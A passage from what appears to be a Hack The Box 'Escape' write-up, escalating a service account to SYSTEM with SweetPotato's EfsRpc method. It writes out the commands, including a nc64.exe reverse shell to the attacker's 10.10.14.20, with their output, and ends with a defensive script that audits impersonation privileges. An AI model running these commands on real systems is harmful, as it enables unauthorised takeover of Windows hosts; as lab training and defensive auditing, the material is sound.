SweetPotato
As discovered previously, the sql_svc user has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set. This makes the target system vulnerable to the Potato family of exploits. While JuicyPotato's token impersonation does not work on anything above Windows 10 1809 and Windows Server 2019, I should be able to use SweetPotato.
SweetPotato is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. It was created by @EthicalChaos and includes:
- RottenPotato
- Weaponized JuicyPotato with BITS WinRM discovery
- PrintSpoofer discovery and original exploit
- EfsRpc built on EfsPotato
- PetitPotam
Exploit
The binary can be downloaded from the official GitHub repo.
Exploitation
```
*evil-winrm* PS C:\tmp> copy \\10.10.14.20\smb\SweetPotato.exe C:\tmp\SweetPotato.exe
```
Delivery complete.
```
*evil-winrm* PS C:\tmp> .\SweetPotato.exe -p "C:\tmp\nc64.exe" -a "10.10.14.20 1234 -e cmd" -e EfsRpc
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] attempting np impersonation using method efsrpc to launch c:\tmp\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/faa2e271-10d0-414d-85bd-8387db4e87f8/\faa2e271-10d0-414d-85bd-8387db4e87f8\faa2e271-10d0-414d-85bd-8387db4e87f8
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
```
The command above uses the EfsRpc method, which targets the MS-EFSR EfsRpcOpenFileRaw call and relies on SeImpersonatePrivilege to impersonate the SYSTEM client that connects back to the named pipe.
```
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.202] 50669
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
whoami
nt authority\system

C:\Windows\system32> hostname
hostname
dc

C:\Windows\system32> ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::21c
   IPv6 Address. . . . . . . . . . . : dead:beef::31e1:eb54:2784:d5cd
   Link-local IPv6 Address . . . . . : fe80::31e1:eb54:2784:d5cd%4
   IPv4 Address. . . . . . . . . . . : 10.10.11.202
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%4
                                       10.10.10.2
```
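The whole chain hinges on the user-rights assignment noted at the top of the page, and that is the thing a defender can audit. The script below is an added example, not part of this writeup or of SweetPotato: it parses the `[Privilege Rights]` section of a `secedit /export /cfg` template (a constructed excerpt is embedded; real exports are UTF-16LE) and reports every principal holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege beyond an assumed default baseline, which is how a service account like sql_svc would show up before anyone points a Potato at it.

```python
import configparser

# Privileges a Potato-style attack needs; any non-default holder deserves review.
WATCHED = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Well-known SIDs that hold these rights by default on a Windows server
# (assumed baseline; roles such as IIS add IIS_IUSRS, S-1-5-32-568).
DEFAULT_HOLDERS = {
    "S-1-5-32-544",  # BUILTIN\Administrators
    "S-1-5-19",      # NT AUTHORITY\LOCAL SERVICE
    "S-1-5-20",      # NT AUTHORITY\NETWORK SERVICE
    "S-1-5-6",       # NT AUTHORITY\SERVICE
}

# Constructed excerpt of `secedit /export /cfg out.inf`; the S-1-5-21-... SID is a
# placeholder standing in for a domain service account such as sql_svc.
SAMPLE_INF = """[Unicode]
Unicode=yes
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeShutdownPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""

def parse_privilege_rights(inf_text):
    """Return {privilege: [principal, ...]} from the [Privilege Rights] section."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep privilege names case-sensitive
    cp.read_string(inf_text)
    rights = {}
    for name, value in cp["Privilege Rights"].items():
        # Entries are comma-separated; SIDs carry a leading '*', account names do not.
        rights[name] = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
    return rights

def nondefault_holders(inf_text):
    """Map each watched privilege to the principals holding it beyond the baseline."""
    rights = parse_privilege_rights(inf_text)
    return {priv: [p for p in rights.get(priv, []) if p not in DEFAULT_HOLDERS]
            for priv in WATCHED}

if __name__ == "__main__":
    for priv, extra in nondefault_holders(SAMPLE_INF).items():
        print(f"{priv}: {extra or 'defaults only'}")
```

Resolve any reported SID with `Get-ADObject`/`wmic useraccount` and decide whether that service really needs the right; for SQL Server the usual answer is a lower-privileged or virtual service account.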
System Level Compromise